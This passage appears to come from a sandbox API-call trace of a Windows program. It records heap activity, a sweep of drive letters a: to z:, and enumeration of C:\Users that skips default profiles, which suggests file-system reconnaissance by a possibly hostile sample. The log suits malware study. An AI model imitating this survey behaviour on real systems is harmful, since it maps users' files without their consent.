wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.923] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690760 [0072.923] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6b6fb8 [0072.923] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690750 [0072.924] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b6fb8 | out: hHeap=0x650000) returned 1 [0072.924] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690750 | out: hHeap=0x650000) returned 1 [0072.924] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690750 [0072.924] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0072.924] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0072.924] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690750 | out: hHeap=0x650000) returned 1 [0072.924] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690760 | out: hHeap=0x650000) returned 1 [0072.924] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cf00 [0072.924] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76a670 [0072.924] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76a910 [0072.924] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6c9398 | out: hHeap=0x650000) returned 1 [0072.924] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0072.924] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0072.924] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cf00 | out: hHeap=0x650000) returned 1 [0072.924] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.924] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690760 [0072.924] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cf00 [0072.924] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0072.924] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690750 [0072.924] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0072.924] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690750 | out: hHeap=0x650000) returned 1 [0072.924] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0072.924] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a640 [0072.924] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690750 [0072.924] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690720 [0072.925] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b240 [0072.925] CharLowerBuffW (in: lpsz="ALL", cchLength=0x3 | out: lpsz="all") returned 0x3 [0072.925] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0072.925] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0072.925] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0072.925] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0072.925] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0072.925] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0072.926] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0072.926] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0072.926] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0072.926] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0072.926] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0072.926] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0072.927] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0072.927] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0072.927] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0072.927] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0072.927] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0072.927] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0072.928] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0072.928] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0072.928] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0072.928] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0072.928] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0072.928] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0072.929] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0072.929] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0072.929] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a640 | out: hHeap=0x650000) returned 1 [0072.929] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690750 | out: hHeap=0x650000) returned 1 [0072.929] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a658 | out: hHeap=0x650000) returned 1 [0072.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690750 [0072.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x6b6fb8 [0072.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690600 [0072.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a658 [0072.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a640 [0072.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6907f0 [0072.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b258 [0072.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aec8 [0072.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aeb0 [0072.929] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b258 | out: hHeap=0x650000) returned 1 [0072.929] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b240 | out: hHeap=0x650000) returned 1 [0072.929] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690720 | out: hHeap=0x650000) returned 1 [0072.930] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a670 | out: hHeap=0x650000) returned 1 [0072.930] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a910 | out: hHeap=0x650000) returned 1 [0072.930] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cf00 | out: hHeap=0x650000) returned 1 [0072.930] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690760 | out: hHeap=0x650000) returned 1 [0072.930] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cf00 [0072.930] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a910 [0072.930] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690760 [0072.930] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a670 [0072.930] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690720 [0072.930] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690750 | out: hHeap=0x650000) returned 1 [0072.930] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.930] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cf78 [0072.930] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b240 [0072.930] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690750 [0072.930] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b258 [0072.930] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690590 [0072.930] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690590 | out: hHeap=0x650000) returned 1 [0072.930] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690590 [0072.930] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690690 [0072.930] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690690 | out: hHeap=0x650000) returned 1 [0072.930] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690590 | out: hHeap=0x650000) returned 1 [0072.930] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6c9398 [0072.930] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.930] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690590 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690690 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690630 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.931] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b120 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cf50 [0072.931] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0072.931] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cf50 | out: hHeap=0x650000) returned 1 [0072.931] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b0c0 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b4f8 [0072.931] PeekMessageW (in: lpMsg=0x61f10c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f10c) returned 0 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cf50 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aca0 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0072.931] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b060 [0072.931] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0072.931] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0072.932] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b060 | out: hHeap=0x650000) returned 1 [0072.932] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aca0 | out: hHeap=0x650000) returned 1 [0072.932] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cf50 | out: hHeap=0x650000) returned 1 [0072.932] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0072.932] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0072.932] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b88f8 [0072.932] PeekMessageW (in: lpMsg=0x61f10c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f10c) returned 0 [0072.932] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0072.932] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0072.932] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aca0 [0072.932] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0072.932] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0072.932] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b060 [0072.932] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aca0 | out: hHeap=0x650000) returned 1 [0072.932] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b88f8 | out: hHeap=0x650000) returned 1 [0072.932] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aca0 [0072.932] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b060 | out: hHeap=0x650000) returned 1 [0072.932] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b4f8 | out: hHeap=0x650000) returned 1 [0072.932] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0c0 | out: hHeap=0x650000) returned 1 [0072.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c:", cchCount1=2, lpString2="C:", cchCount2=2) returned 2 [0072.932] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b120 | out: hHeap=0x650000) returned 1 [0072.932] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.932] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690630 | out: hHeap=0x650000) returned 1 [0072.933] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aca0 | out: hHeap=0x650000) returned 1 [0072.933] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0072.933] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690690 | out: hHeap=0x650000) returned 1 [0072.933] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690590 | out: hHeap=0x650000) returned 1 [0072.933] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b88f8 [0072.933] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.933] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b88f8 | out: hHeap=0x650000) returned 1 [0072.933] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.933] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6c9398 | out: hHeap=0x650000) returned 1 [0072.933] PeekMessageW (in: lpMsg=0x61f52c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f52c) returned 0 [0072.933] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690590 [0072.933] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690690 [0072.933] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692de8 [0072.933] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0072.933] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692de8 | out: hHeap=0x650000) returned 1 [0072.933] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690690 | out: hHeap=0x650000) returned 1 [0072.933] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cf50 [0072.933] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690690 [0072.933] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cfa0 [0072.933] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aca0 [0072.933] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690630 [0072.933] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b120 [0072.933] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690630 | out: hHeap=0x650000) returned 1 [0072.933] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690630 [0072.933] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0c0 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b060 [0072.934] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690730 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b078 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0072.934] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b0a8 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cfc8 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cf28 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0072.934] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6a8 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0072.934] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0072.935] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d658 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad00 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad48 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690850 [0072.935] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d068 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690670 [0072.935] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690670 | out: hHeap=0x650000) returned 1 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d630 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690670 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690830 [0072.935] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690830 | out: hHeap=0x650000) returned 1 [0072.935] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68cff0 [0072.935] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.935] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac58 | out: hHeap=0x650000) returned 1 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0072.936] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.936] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default|Defaultuser|Defaultuser0|Default User", cchCount1=45, lpString2="|", cchCount2=1) returned 3 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0072.936] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906f0 | out: hHeap=0x650000) returned 1 [0072.936] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d798 | out: hHeap=0x650000) returned 1 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0072.936] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a940 | out: hHeap=0x650000) returned 1 [0072.936] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d798 | out: hHeap=0x650000) returned 1 [0072.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0072.937] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0072.937] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.937] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8b0 | out: hHeap=0x650000) returned 1 [0072.937] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default|Defaultuser|Defaultuser0|Default User", cchCount1=45, lpString2="*", cchCount2=1) returned 3 [0072.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default|Defaultuser|Defaultuser0|Default User", cchCount1=45, lpString2="", cchCount2=0) returned 3 [0072.937] PeekMessageW (in: lpMsg=0x61effc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61effc) returned 0 [0072.937] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0072.937] PeekMessageW (in: lpMsg=0x61eda4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eda4) returned 0 [0072.937] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x61e7f0 | out: lpFindFileData=0x61e7f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b98e0, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b88f8 [0072.937] FindNextFileW (in: hFindFile=0x6b88f8, lpFindFileData=0x61e7f0 | out: lpFindFileData=0x61e7f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b98e0, 